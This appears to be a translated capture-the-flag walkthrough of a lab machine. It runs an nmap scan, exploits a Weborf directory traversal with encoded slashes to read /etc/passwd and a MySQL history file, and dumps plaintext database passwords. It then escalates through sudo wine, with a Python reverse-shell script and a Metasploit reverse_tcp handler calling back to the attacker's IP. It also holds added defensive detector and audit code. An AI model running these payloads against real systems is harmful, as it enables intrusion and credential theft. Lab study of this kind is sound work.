1. Host discovery
Using netdiscover, the target IP was found to be 192.168.203.140.
2. Port scanning
root@kali:~# nmap -sS -A 192.168.203.140 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 17:51 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.140
Host is up (0.00039s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.38
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /: Root directory w/ listing on 'apache/2.4.38 (debian)'
|_http-server-header: Apache/2.4.38 (Debian)
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=S%3bO%3dD%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=M%3bO%3dD%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=D%3bO%3dD%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|_ http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.38:
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
| CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082
| CVE-2019-10097 6.0 https://vulners.com/cve/CVE-2019-10097
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2019-0215 6.0 https://vulners.com/cve/CVE-2019-0215
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2019-10081 5.0 https://vulners.com/cve/CVE-2019-10081
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196
| CVE-2019-0197 4.9 https://vulners.com/cve/CVE-2019-0197
|_ CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
3306/tcp open mysql?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
| NULL:
|_ Host '192.168.203.129' is not allowed to connect to this MariaDB server
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
8080/tcp open http-proxy Weborf (GNU/Linux)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Page not found: Weborf (GNU/Linux)
| Content-Length: 202
| Content-Type: text/html
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| GetRequest:
| HTTP/1.1 200
| Server: Weborf (GNU/Linux)
| Content-Length: 326
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><tr style="background-color: #DFDFDF;"><td>d</td><td><a href="html/">html/</a></td><td>-</td></tr>
| </table><p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 200
| Server: Weborf (GNU/Linux)
| Allow: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
| DAV: 1,2
| DAV: <http://apache.org/dav/propset/fs/1>
| MS-Author-Via: DAV
| Socks5:
| HTTP/1.1 400 Bad request: Weborf (GNU/Linux)
| Content-Length: 199
| Content-Type: text/html
|_ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 400</H1>Bad request <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| http-enum:
| /../../../../../../../../../../etc/passwd: Possible path traversal in URI
| /../../../../../../../../../../boot.ini: Possible path traversal in URI
|_ /html/: Potentially interesting folder
|_http-server-header: Weborf (GNU/Linux)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 00:0C:29:0F:49:BE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.39 ms 192.168.203.140
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.33 seconds
I wondered why this scan took so long; it turns out it found some notable things.
The open ports are 22, 80, 3306 and 8080.
3. Exploitation
Port 80 turned out to be just a simple directory listing.
Let's go straight to port 8080, which according to the scan results has an arbitrary file read:
http://192.168.203.140:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
The slashes here have to be URL-encoded, otherwise it does not work.
We can see the file is read successfully.
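Added example, not part of the original write-up: a request-line check that percent-decodes the URI before normalising it (a plausible reason a raw /../ is rejected while %2f passes, as the text above notes), run over constructed sample request lines; the first line mirrors the encoded-slash URL shape used above.

```python
from urllib.parse import unquote

# Constructed sample request lines (not from the target's logs). The first uses the
# encoded-slash shape shown above; the fourth contains '..' without leaving the root.
SAMPLE_REQUESTS = [
    "GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1",
    "GET /html/index.html HTTP/1.1",
    "GET /../../../../etc/passwd HTTP/1.1",
    "GET /html/..%2fhtml/a.txt HTTP/1.1",
    "GET /%252e%252e%252fetc/passwd HTTP/1.1",
]

def decode_fully(path, max_rounds=3):
    """Percent-decode repeatedly so double-encoded forms like %252f are unwrapped too."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def escapes_docroot(raw_path):
    """True when the decoded, normalised path climbs above the document root.

    Decode first, normalise second: a server that collapses '../' on the raw
    string and only afterwards decodes '%2f' lets an encoded traversal through.
    Tracking depth (rather than grepping for '..') avoids flagging
    '/html/../html/a.txt', which never leaves the root.
    """
    decoded = decode_fully(raw_path.split("?", 1)[0])
    depth = 0
    for segment in decoded.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False

def flag_traversal(lines):
    """Return the request lines whose URI escapes the document root."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) >= 2 and escapes_docroot(parts[1]):
            hits.append(line)
    return hits
```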
This is a directory traversal vulnerability in Weborf.
Original article: http://www.gltc.cn/31328.html
In the /etc/passwd we read, we see the home directory of the user weborf, so we visit it:
http://192.168.203.140:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f
Using dirb to scan that directory turned up something good:
.mysql_history, which holds the database account and password:
show databases;
ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44';
Let's try whether we can connect over SSH with it:
Went through the usual series of privilege escalation checks without finding a usable escalation point, so finally chose to go into MySQL:
MariaDB [(none)]> show database;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'database' at line 1
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
+--------------------+
3 rows in set (0.001 sec)
MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [mysql]> show tables;
+---------------------------+
| Tables_in_mysql |
+---------------------------+
| column_stats |
| columns_priv |
| db |
| event |
| func |
| general_log |
| gtid_slave_pos |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| index_stats |
| innodb_index_stats |
| innodb_table_stats |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| roles_mapping |
| servers |
| slow_log |
| table_stats |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| transaction_registry |
| user |
+---------------------------+
31 rows in set (0.001 sec)
MariaDB [mysql]> describe user;
+------------------------+-----------------------------------+------+-----+----------+-------+
| Field | Type | Null | Key | Default | Extra |
+------------------------+-----------------------------------+------+-----+----------+-------+
| Host | char(60) | NO | PRI | | |
| User | char(80) | NO | PRI | | |
| Password | char(41) | NO | | | |
| Select_priv | enum('N','Y') | NO | | N | |
| Insert_priv | enum('N','Y') | NO | | N | |
| Update_priv | enum('N','Y') | NO | | N | |
| Delete_priv | enum('N','Y') | NO | | N | |
| Create_priv | enum('N','Y') | NO | | N | |
| Drop_priv | enum('N','Y') | NO | | N | |
| Reload_priv | enum('N','Y') | NO | | N | |
| Shutdown_priv | enum('N','Y') | NO | | N | |
| Process_priv | enum('N','Y') | NO | | N | |
| File_priv | enum('N','Y') | NO | | N | |
| Grant_priv | enum('N','Y') | NO | | N | |
| References_priv | enum('N','Y') | NO | | N | |
| Index_priv | enum('N','Y') | NO | | N | |
| Alter_priv | enum('N','Y') | NO | | N | |
| Show_db_priv | enum('N','Y') | NO | | N | |
| Super_priv | enum('N','Y') | NO | | N | |
| Create_tmp_table_priv | enum('N','Y') | NO | | N | |
| Lock_tables_priv | enum('N','Y') | NO | | N | |
| Execute_priv | enum('N','Y') | NO | | N | |
| Repl_slave_priv | enum('N','Y') | NO | | N | |
| Repl_client_priv | enum('N','Y') | NO | | N | |
| Create_view_priv | enum('N','Y') | NO | | N | |
| Show_view_priv | enum('N','Y') | NO | | N | |
| Create_routine_priv | enum('N','Y') | NO | | N | |
| Alter_routine_priv | enum('N','Y') | NO | | N | |
| Create_user_priv | enum('N','Y') | NO | | N | |
| Event_priv | enum('N','Y') | NO | | N | |
| Trigger_priv | enum('N','Y') | NO | | N | |
| Create_tablespace_priv | enum('N','Y') | NO | | N | |
| Delete_history_priv | enum('N','Y') | NO | | N | |
| ssl_type | enum('','ANY','X509','SPECIFIED') | NO | | | |
| ssl_cipher | blob | NO | | NULL | |
| x509_issuer | blob | NO | | NULL | |
| x509_subject | blob | NO | | NULL | |
| max_questions | int(11) unsigned | NO | | 0 | |
| max_updates | int(11) unsigned | NO | | 0 | |
| max_connections | int(11) unsigned | NO | | 0 | |
| max_user_connections | int(11) | NO | | 0 | |
| plugin | char(64) | NO | | | |
| authentication_string | text | NO | | NULL | |
| password_expired | enum('N','Y') | NO | | N | |
| is_role | enum('N','Y') | NO | | N | |
| default_role | char(80) | NO | | | |
| max_statement_time | decimal(12,6) | NO | | 0.000000 | |
+------------------------+-----------------------------------+------+-----+----------+-------+
47 rows in set (0.002 sec)
MariaDB [mysql]> select User,Password from user;
+---------+-------------------------------------------+
| User | Password |
+---------+-------------------------------------------+
| root | *C7B6683EEB8FF8329D8390574FAA04DD04B87C58 |
| sunrise | thefutureissobrightigottawearshades |
| weborf | *A76018C6BB42E371FD7B71D2EC6447AE6E37DB28 |
+---------+-------------------------------------------+
3 rows in set (0.001 sec)
4. Privilege escalation
We now have sunrise's account and plaintext password; root's password is stored hashed and it is not yet clear which hash it is, so let's log in with sunrise's account first and take a look.
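Added example, not part of the original write-up: an audit of the mysql.user rows shown above that checks each Password column value against the mysql_native_password shape ('*' followed by 40 hex digits, SHA1(SHA1(pw))) and flags values that were stored literally, which is what happens in MariaDB when SET PASSWORD is given a plain string instead of PASSWORD('...'). The rows are copied from the query output above; the "password" test vector is the documented MySQL one.

```python
import hashlib
import re

# mysql_native_password values are '*' followed by 40 upper-case hex digits.
NATIVE_HASH = re.compile(r"^\*[0-9A-F]{40}$")

# Rows copied from the `select User,Password from user` output in this write-up.
USER_ROWS = [
    ("root", "*C7B6683EEB8FF8329D8390574FAA04DD04B87C58"),
    ("sunrise", "thefutureissobrightigottawearshades"),
    ("weborf", "*A76018C6BB42E371FD7B71D2EC6447AE6E37DB28"),
]

def mysql_native_password(plaintext):
    """Compute a mysql_native_password hash: '*' + hex(SHA1(SHA1(pw))).upper()."""
    inner = hashlib.sha1(plaintext.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()

def classify_password_column(value):
    """Label a Password column value: 'empty', 'mysql_native', or 'not_a_hash'."""
    if value == "":
        return "empty"
    if NATIVE_HASH.match(value):
        return "mysql_native"
    # Anything else (e.g. a readable phrase) was stored literally and is
    # readable by anyone who can query mysql.user.
    return "not_a_hash"

def audit_users(rows):
    """Return (user, finding) pairs for accounts whose credential storage is unsafe."""
    findings = []
    for user, stored in rows:
        kind = classify_password_column(stored)
        if kind == "empty":
            findings.append((user, "no password set"))
        elif kind == "not_a_hash":
            findings.append((user, "Password column holds a literal value, not a hash"))
    return findings

def uses_known_password(stored, candidate):
    """True if a stored native hash matches a given plaintext, e.g. to find accounts
    still using a password that appeared in a leaked file so they can be rotated."""
    return stored == mysql_native_password(candidate)

if __name__ == "__main__":
    for user, finding in audit_users(USER_ROWS):
        print(f"{user}: {finding}")
```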
Running sudo -l shows that this account may run wine with root privileges.
About wine:
Wine (a recursive acronym for "Wine Is Not an Emulator") is a compatibility layer that runs Windows applications on several POSIX-compliant operating systems such as Linux, Mac OS X and BSD.
This is easy to understand: use wine to run an exe trojan and get a reverse shell. I originally wanted to package a Python script into an exe trojan with pyinstaller, but after converting my Python script to an exe it would not run properly:
import socket, subprocess, os
# connect back to the listener at 192.168.203.129:1234
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.203.129", 1234))
# attach stdin, stdout and stderr to the socket
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# start an interactive shell on those descriptors (/bin/bash is a POSIX path)
p = subprocess.call(["/bin/bash", "-i"])
I'm not sure why this happens; I hope someone who understands it can explain it to me, thanks!
So I'll just go back to using msf.
We can see two files were generated: an exe file and a .rc instruction file.
Let's look at the instruction file first:
In msf, configure according to the instruction file and start the listener:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.203.129
lhost => 192.168.203.129
msf5 exploit(multi/handler) > set lport 443
lport => 443
msf5 exploit(multi/handler) > set exitonsession false
exitonsession => false
msf5 exploit(multi/handler) > set enablestageencoding true
enablestageencoding => true
msf5 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.203.129:443
Next, transfer the exe trojan to the target machine.
Start a web server on Kali:
root@kali:~# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
We can see that we now have root privileges.